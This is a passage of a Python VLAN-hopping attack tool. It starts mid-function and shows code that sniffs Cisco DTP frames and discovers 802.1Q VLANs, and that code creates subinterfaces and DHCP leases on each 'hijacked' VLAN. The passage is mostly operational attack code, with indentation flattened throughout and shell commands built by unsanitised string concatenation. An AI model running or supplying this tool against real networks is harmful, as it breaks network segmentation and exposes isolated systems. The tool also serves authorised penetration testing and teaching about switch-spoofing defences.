    time.sleep(3)
    shell('dhclient -r {}'.format(subif))
    time.sleep(5)
    shell('dhclient {}'.format(subif))

    time.sleep(3)
    ip = getIfaceIP(subif)

    if ip:
    Logger.dbg('Subinterface has IP: {}'.format(ip))
    ret = True

    print('[+] Hopped to VLAN {}.: {}'.format(vlan, ip))
    break

    if not ret:
    Logger.fail('Could not acquire DHCP lease for: {}'.format(subif))
    Logger.fail('Skipping...')

    else:
    Logger.fail('Failed.: "{}"'.format(out))

    def packetCallback(pkt):
    Logger.dbg('RECV: ' + pkt.summary())

    def sniffThread():
    global vlansHijacked

    warnOnce = False

    Logger.info('Sniffing for DTP frames (Max count: {}, Max timeout: {} seconds)...'.format(
    config['count'], config['timeout']
    ))

    while not stopThreads and not attackEngaged:
    dtps = sniff(
    count = config['count'],
    filter = 'ether[20:2] == 0x2004',
    timeout = config['timeout'],
    prn = packetCallback,
    stop_filter = lambda x: x.haslayer(DTP) or stopThreads,
    iface = config['interface']
    )

    if len(dtps) == 0 and not warnOnce:
    Logger.fail('It seems like there was no DTP frames transmitted.')
    Logger.fail('VLAN Hopping may not be possible (unless Switch is in Non-negotiate state):')
    Logger.info('\n\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ')
    Logger.info('\tSWITCH(config-if)# switchport mode access')
    Logger.info('\nWill continue scanning...')
    warnOnce = True

    else:
    Logger.info('Got {} DTP frames.\n'.format(
    len(dtps)
    ))

    t = threading.Thread(target = processDtps, args = (dtps, ))
    t.daemon = True
    t.start()

    Logger.info('Starting VLAN/802.1Q sniffer.')

    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    sock.bind((config['interface'], ETH_P_ALL))
    enable_auxdata(sock)

    while not stopThreads:
    buf = recv(sock, 65535)
    pkt = Ether(buf)

    if pkt.haslayer(Dot1Q):
    dot1q = pkt.vlan
    if dot1q not in vlansHijacked:
    print('==> VLAN discovered: {}'.format(dot1q))
    vlansHijacked.add(dot1q)

    t = threading.Thread(target = addVlanIface, args = (dot1q, ))
    t.daemon = True
    t.start()

    Logger.dbg('Stopped sniffing.')

    def getHwAddr(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
    return ':'.join(['%02x' % ord(char) for char in info[18:24]])

    def getIfaceIP(iface):
    out = shell("ip addr show " + iface + " | grep inet | awk '{print $2}' | head -1 | cut -d/ -f1")
    Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
    return out

    def assure8021qCapabilities():
    if not ('8021q' in shell('lsmod | grep 8021q | head -1')):
    Logger.err('There is no kernel module named: "8021q". Fatal error.')
    return False

    if not shell('which vconfig'):
    Logger.err('There is no "vconfig" utility. Package required: "vconfig". Fatal error.')
    return False

    shell('modprobe 8021q')

    return True

    def shell(cmd):
    out = commands.getstatusoutput(cmd)[1]
    Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
    return out

    def selectDefaultInterface():
    global config
    commands = {
    'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
    'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
    }

    for k, v in commands.items():
    out = shell(v)
    if len(out) > 0:
    Logger.info('Default interface lookup command returned:\n{}'.format(out))
    config['interface'] = out
    return out

    return ''

    def parseOptions(argv):
    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
    parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
    parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
    parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')

    if len(argv) < 2:
    parser.print_help()
    return False

    args = parser.parse_args()

    config['verbose'] = args.verbose
    config['debug'] = args.debug
    config['interface'] = args.interface

    return args

    def main(argv):
    global config
    global stopThreads

    if os.getuid() != 0:
    Logger.err('[!] This program must be run as root.')
    return False

    opts = parseOptions(argv)
    if not opts:
    Logger.err('Options parsing failed.')
    return False

    if not assure8021qCapabilities():
    Logger.err('Unable to proceed.')
    return False

    if not opts.interface:
    if not selectDefaultInterface():
    Logger.err('Could not find suitable interface. Please specify it.')
    return False

    Logger.info('Interface to work on: "{}"'.format(config['interface']))

    config['macaddr'] = getHwAddr(config['interface'])
    if not config['macaddr']:
    Logger.err('Could not acquire MAC address of interface: "{}"'.format(
    config['interface']
    ))
    return False
    else:
    Logger.dbg('Interface "{}" has MAC address: "{}"'.format(
    config['interface'], config['macaddr']
    ))

    config['inet'] = getIfaceIP(config['interface'])
    if not config['inet']:
    Logger.err('Could not acquire interface\'s IP address!')
    return ''

    load_contrib('dtp')

    t = threading.Thread(target = sniffThread)
    t.daemon = True
    t.start()

    try:
    while True:
    pass
    except KeyboardInterrupt:
    Logger.info('Stopping...')

    stopThreads = True
    time.sleep(3)

    for subif in subinterfaces:
    Logger.dbg('Removing subinterface: {}'.format(subif))
    shell('vconfig rem {}'.format(subif))

    return True

    if __name__ == '__main__':
    main(sys.argv)